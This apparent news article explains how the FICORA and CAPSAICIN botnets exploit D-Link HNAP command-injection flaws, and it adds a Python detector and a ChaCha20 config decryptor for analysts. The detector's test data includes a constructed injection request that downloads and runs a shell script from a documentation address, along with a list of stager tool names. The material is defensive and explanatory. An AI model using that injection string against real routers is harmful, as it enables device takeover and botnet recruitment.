A surge in attacks exploiting long-known vulnerabilities in D-Link routers has been observed, with two botnets, FICORA and CAPSAICIN, actively exploiting them.

Fortinet’s FortiGuard Labs researchers observed a spike in activity from both botnets during October and November 2024, underscoring the ongoing danger posed by end-of-life and unpatched network devices.

Exploitation of Decade-Old Vulnerabilities

Both botnets exploit command-injection flaws in the Home Network Administration Protocol (HNAP) interface of D-Link routers. The router’s HNAP handler passes attacker-controlled input from a crafted POST to /HNAP1/ (in the CVE-2015-2051 case, the SOAPAction header of a GetDeviceSettings request) to a shell without sanitizing it, so an attacker who can reach the interface can execute arbitrary OS commands on the device.

These flaws, tracked as CVE-2015-2051, CVE-2019-10891, CVE-2022-37056 and CVE-2024-33112, were disclosed between 2015 and 2024, the oldest nearly a decade ago, yet they remain a substantial threat because so many affected devices have never been patched.

Although firmware fixes exist for many of these vulnerabilities, and some of the affected models are end-of-life and will never receive one, the continued use of this hardware gives attackers an easy route to large-scale malware distribution.
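The following is an added example, not code from the article or from FortiGuard Labs, of what the HNAP injection described above looks like on the wire and how a simple inspector can flag it. It parses raw HTTP requests and, for anything under /HNAP1, checks whether the SOAPAction header is still a bare HNAP action URL or has had shell metacharacters and a download command appended, as CVE-2015-2051-style exploits do. The sample requests are constructed, 203.0.113.5 is a documentation address, and the list of stager tool names is an assumed indicator set.

```python
"""Flag HNAP command-injection attempts of the CVE-2015-2051 family in raw HTTP requests.

Added example, not code from the Cyber Security News article or FortiGuard Labs.
The sample requests below are constructed; 203.0.113.5 is a documentation address.
"""
import re
from dataclasses import dataclass, field

# A legitimate SOAPAction is exactly one HNAP action URL, optionally quoted.
HNAP_ACTION_RE = re.compile(r'^"?http://purenetworks\.com/HNAP1/[A-Za-z0-9_]+"?$')
# Shell metacharacters that only make sense if the header value is reaching a shell.
SHELL_META_RE = re.compile(r"[`;|&$]")
# Fetch tools typical of Mirai-style stagers (assumed indicator list; tune locally).
STAGER_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.I)


@dataclass
class Alert:
    path: str
    soap_action: str
    reasons: list = field(default_factory=list)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    method = parts[0]
    path = parts[1] if len(parts) > 1 else ""
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")  # split on the first colon only
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body.decode("latin-1", "replace")


def inspect_request(raw: bytes):
    """Return an Alert for a suspicious HNAP request, or None for anything else."""
    method, path, headers, body = parse_request(raw)
    if not path.startswith("/HNAP1"):
        return None
    action = headers.get("soapaction", "")
    reasons = []
    if action and not HNAP_ACTION_RE.match(action):
        reasons.append("SOAPAction is not a bare HNAP action URL")
    if SHELL_META_RE.search(action):
        reasons.append("shell metacharacters in SOAPAction")
    if STAGER_RE.search(action) or STAGER_RE.search(body):
        reasons.append("download tool name in request")
    return Alert(path, action, reasons) if reasons else None


def scan(requests):
    """Inspect many captured requests and return only the alerts."""
    return [a for a in (inspect_request(r) for r in requests) if a]


# Constructed samples: a normal HNAP call, a CVE-2015-2051-style injection, an unrelated request.
BENIGN = (b"POST /HNAP1/ HTTP/1.1\r\nHost: 192.168.0.1\r\n"
          b'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"\r\n'
          b"Content-Length: 0\r\n\r\n")
INJECTION = (b"POST /HNAP1/ HTTP/1.1\r\nHost: 192.168.0.1\r\n"
             b'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/'
             b"`cd /tmp; wget http://203.0.113.5/x.sh; sh x.sh`\"\r\n\r\n")
UNRELATED = b"GET /index.html HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n"

if __name__ == "__main__":
    for alert in scan([BENIGN, INJECTION, UNRELATED]):
        print(alert.path, alert.reasons)
```

This only catches header-borne injection; newer variants in the same family may carry the payload inside the SOAP body, so a production rule should apply the same metacharacter and stager checks to the XML body as well. The benign request shows why the check must be narrow: legitimate HNAP clients send the same POST /HNAP1/ and SOAPAction header, and only the trailing shell fragment distinguishes an exploit.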

The FICORA and CAPSAICIN Botnets

FICORA, a variant of the Mirai malware, brute-forces weak credentials to spread to further devices and encrypts its configuration, including its command-and-control (C2) details, with the ChaCha20 stream cipher to hinder static analysis. It can launch distributed denial-of-service (DDoS) attacks over several protocols, including UDP and TCP.

FICORA botnet
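As an added example, not FortiGuard Labs’ or the malware’s own code, the block below is a pure-Python implementation of ChaCha20 (RFC 8439 layout: 256-bit key, 96-bit nonce, 32-bit block counter) of the kind an analyst writes to decrypt a FICORA-style configuration once the key and nonce have been pulled from the binary. DEMO_KEY, DEMO_NONCE and PLAIN_CONFIG are constructed placeholders, not FICORA’s actual values, and the C2 addresses in the config are documentation/reserved names.

```python
"""RFC 8439 ChaCha20 in pure Python, used to recover an encrypted configuration.

Added example, not FortiGuard Labs' or the malware's code. DEMO_KEY, DEMO_NONCE
and PLAIN_CONFIG are constructed here; they are not FICORA's real values, which
have to be extracted from the sample itself.
"""
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def quarter_round(a, b, c, d):
    """One ChaCha quarter round (RFC 8439 section 2.1)."""
    a = (a + b) & MASK; d = _rotl(d ^ a, 16)
    c = (c + d) & MASK; b = _rotl(b ^ c, 12)
    a = (a + b) & MASK; d = _rotl(d ^ a, 8)
    c = (c + d) & MASK; b = _rotl(b ^ c, 7)
    return a, b, c, d


def chacha20_block(key: bytes, counter: int, nonce: bytes) -> bytes:
    """Return one 64-byte keystream block for a 256-bit key and 96-bit nonce."""
    if len(key) != 32 or len(nonce) != 12:
        raise ValueError("ChaCha20 needs a 32-byte key and a 12-byte nonce")
    state = [0x61707865, 0x3320646E, 0x79622D32, 0x6B206574]  # "expand 32-byte k"
    state += struct.unpack("<8I", key)
    state.append(counter & MASK)
    state += struct.unpack("<3I", nonce)
    x = state[:]
    for _ in range(10):  # 20 rounds = 10 column/diagonal double rounds
        for i in range(4):  # column rounds
            x[i], x[i + 4], x[i + 8], x[i + 12] = quarter_round(x[i], x[i + 4], x[i + 8], x[i + 12])
        x[0], x[5], x[10], x[15] = quarter_round(x[0], x[5], x[10], x[15])  # diagonal rounds
        x[1], x[6], x[11], x[12] = quarter_round(x[1], x[6], x[11], x[12])
        x[2], x[7], x[8], x[13] = quarter_round(x[2], x[7], x[8], x[13])
        x[3], x[4], x[9], x[14] = quarter_round(x[3], x[4], x[9], x[14])
    return struct.pack("<16I", *[(x[i] + state[i]) & MASK for i in range(16)])


def chacha20_xor(key: bytes, nonce: bytes, data: bytes, counter: int = 0) -> bytes:
    """Encrypt or decrypt (same operation) by XOR-ing data with the keystream.

    The initial counter is a parameter because implementations differ: RFC 8439
    AEAD starts at 1, many bare-ChaCha users (malware included) start at 0.
    """
    out = bytearray()
    for off in range(0, len(data), 64):
        block = chacha20_block(key, counter + off // 64, nonce)
        out += bytes(p ^ k for p, k in zip(data[off:off + 64], block))
    return bytes(out)


def recover_config(blob: bytes, key: bytes, nonce: bytes, counter: int = 0) -> str:
    """Decrypt an encrypted configuration blob and return it as text."""
    return chacha20_xor(key, nonce, blob, counter).decode("utf-8")


# Constructed demo material (not the malware's real key, nonce or config).
DEMO_KEY = bytes(range(32))
DEMO_NONCE = bytes(range(12))
PLAIN_CONFIG = ("c2=203.0.113.7:1337\n"
                "fallback=c2.example.net:1337\n"
                "user=admin;pass=admin\n"
                "user=root;pass=12345\n")  # > 64 bytes, so decryption spans two blocks
ENCRYPTED_CONFIG = chacha20_xor(DEMO_KEY, DEMO_NONCE, PLAIN_CONFIG.encode())

if __name__ == "__main__":
    print(recover_config(ENCRYPTED_CONFIG, DEMO_KEY, DEMO_NONCE))
```

If a real sample decrypts to garbage with the right key, check the state layout before suspecting the key: the original DJB variant uses a 64-bit counter and 64-bit nonce (words 12-13 and 14-15), and some implementations start the counter at 1 rather than 0. Both are one-line changes here, which is why a self-written decryptor beats a library call that hides the layout.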

CAPSAICIN, by contrast, is based on the Kaiten (Tsunami) bot; it spreads quickly and kills competing botnet malware on infected devices so that it alone retains control.

CAPSAICIN botnet

FortiGuard Labs traced FICORA’s distribution to servers in the Netherlands (185[.]191[.]126[.]213 and 185[.]191[.]126[.]248). Targets were spread across the globe, indicating an opportunistic campaign that attacks any reachable vulnerable device rather than specific victims.

Both botnets underline the risk of aging network hardware. Although these vulnerabilities have been public for years, many organizations have neither applied updates nor replaced obsolete devices, so attackers keep exploiting the same flaws.

Experts strongly recommend that enterprises and individuals take the following preventive steps to mitigate these risks:

  • Regular Maintenance: Keep all routers and network devices on the latest vendor firmware.
  • Hardware Renewal: Replace end-of-life (EOL) hardware that no longer receives security updates.
  • Network Monitoring: Deploy monitoring that can detect abnormal traffic, such as HNAP requests to /HNAP1/ arriving from the internet, unexpected outbound connections from a router, or DDoS-scale traffic volumes leaving the network.
  • Access Controls: Disable remote (WAN-side) management, including HNAP, unless it is essential, and use strong, unique passwords for device access so that brute-force attempts like FICORA’s fail.

Organizations should prioritize updating or replacing vulnerable devices so that their equipment is not conscripted into botnet campaigns.

The article “D-Link Routers Under Attack – Networks Capitalizing on Devices to Acquire Unrestricted Remote Authority” was first published on Cyber Security News.